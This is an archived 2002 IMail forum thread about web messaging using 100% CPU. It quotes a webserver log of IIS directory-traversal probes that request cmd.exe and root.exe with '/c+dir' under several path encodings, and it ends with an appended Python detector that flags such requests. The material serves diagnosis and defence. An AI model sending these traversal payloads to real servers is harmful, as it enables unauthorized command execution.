Zul,

Same here... it looked as if it was a web security hole searching robot, because the 100% started at about that time. Check your webmail logs for attacks.

---------------------------------- Begin of log snippet
20020111 182946 Info - 212.181.118.32 GET /scripts/root.exe?/c+dir HTTP/1.0.
20020111 182947 Request processed with no user agent and no referer.
20020111 182951 Info - 212.181.118.32 GET /MSADC/root.exe?/c+dir HTTP/1.0.
20020111 182951 Request processed with no user agent and no referer.
20020111 182955 Info - 212.181.118.32 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 182956 Request processed with no user agent and no referer.
20020111 182956 Info - 212.80.96.33 WhatsUp_Gold/6.0 HEAD / HTTP/1.0.
20020111 183000 Info - 212.181.118.32 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183000 Request processed with no user agent and no referer.
20020111 183004 Info - 212.181.118.32 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183004 Request processed with no user agent and no referer.
20020111 183008 Info - 212.181.118.32 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183008 Request processed with no user agent and no referer.
20020111 183012 Info - 212.181.118.32 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183012 Request processed with no user agent and no referer.
20020111 183017 Info - 212.181.118.32 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183017 Request processed with no user agent and no referer.
20020111 183023 Info - 212.181.118.32 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183023 Request processed with no user agent and no referer.
20020111 183028 Info - 212.181.118.32 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183028 Request processed with no user agent and no referer.
20020111 183035 Info - 212.181.118.32 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183035 Request processed with no user agent and no referer.
20020111 183040 Info - 212.181.118.32 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183040 Request processed with no user agent and no referer.
20020111 183047 Info - 212.181.118.32 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183047 Request processed with no user agent and no referer.
20020111 183052 Info - 212.181.118.32 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183052 Request processed with no user agent and no referer.
20020111 183056 Info - 212.80.96.33 WhatsUp_Gold/6.0 HEAD / HTTP/1.0.
20020111 183056 Info - 212.181.118.32 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183057 Request processed with no user agent and no referer.
20020111 183104 Info - 212.181.118.32 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020111 183104 Request processed with no user agent and no referer.
---------------------------------- End of log snippet

IPSwitch Support told me to

a) make NT page file 3x the size of physical RAM
b) make sure IMail is the only software running on this server
c) set IP filters to every single attacker's IP-address

When I refused all of these "recommendations", I was told to

d) call support by phone (after renewing service agreement :-(

The error occurred only once (so far). I built a workaround using perfmon alerter to kill and restart iwebmsg service if proc usage is over 90%. To me, it is obvious that the bug is within IMail because all other software has been running smoothly for years now.

Marius

-----Original Message-----
From: Zul J [mailto:[EMAIL PROTECTED]]
Sent: Thursday, January 17, 2002 4:25 AM
To: [EMAIL PROTECTED]
Subject: [IMail Forum] HELP!:Web Messaging uses 100% of the CPU

Hi,

I'm running IMail 7.05, my issue is the web messaging that makes my CPU utilization go to 100% and hangs the server. I encounter this issue after I update to 7.05.

I've already checked the IPSwitch knowledge base (http://support.ipswitch.com/kb/IM-19990527-DM10.htm) and did the solution that they gave but it still happens.

Hope somebody can help me with this...really appreciate it...Thanks..

-Zul
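
One way to run the webmail log check suggested in the reply above, as an added example that is not part of the original messages: it parses lines in the layout of the log snippet, percent-decodes each request path until it stops changing, and counts probe requests per client. The sample lines are constructed (documentation-range addresses), and the function names and reason labels are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Layout assumed from the snippet above: date, time, "Info -", client IP,
# optional user agent, method, request target.
ENTRY = re.compile(r"^\d{8} \d{6} Info - (\S+) (?:\S+ )?(GET|HEAD|POST) (\S+) HTTP/")
SHELLS = (b"cmd.exe", b"root.exe")

def decode_fully(target: str, max_rounds: int = 5) -> bytes:
    """Percent-decode repeatedly so %255c and %%35%63 both end as a backslash."""
    data = target.encode("latin-1")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def classify(line: str):
    """Return (client_ip, sorted reasons) for a probe request, else None."""
    m = ENTRY.match(line)
    if not m:
        return None  # not a request line, e.g. "Request processed with ..."
    ip, _method, target = m.groups()
    path = decode_fully(target.split("?", 1)[0]).lower()
    reasons = set()
    if path.endswith(SHELLS):
        reasons.add("shell-binary")
    if b"../" in path or b"..\\" in path:
        reasons.add("traversal")
    if b"\xc0" in path or b"\xc1" in path:  # never valid UTF-8 lead bytes
        reasons.add("overlong-utf8")
    if "%25" in target or "%%" in target:  # an encoded or doubled percent sign
        reasons.add("double-encoding")
    return (ip, sorted(reasons)) if reasons else None

def probes_by_client(lines):
    """Count flagged requests per client IP."""
    return Counter(hit[0] for hit in map(classify, lines) if hit)

# Constructed sample lines in the same layout as the snippet above.
SAMPLE = [
    "20020111 182946 Info - 192.0.2.10 GET /scripts/root.exe?/c+dir HTTP/1.0.",
    "20020111 182947 Request processed with no user agent and no referer.",
    "20020111 182956 Info - 198.51.100.7 WhatsUp_Gold/6.0 HEAD / HTTP/1.0.",
    "20020111 183004 Info - 192.0.2.10 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.",
    "20020111 183035 Info - 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0.",
    "20020111 183047 Info - 192.0.2.10 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.",
]
```

Calling probes_by_client() on a real log gives a per-address count that can be lined up against the time the CPU load started.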
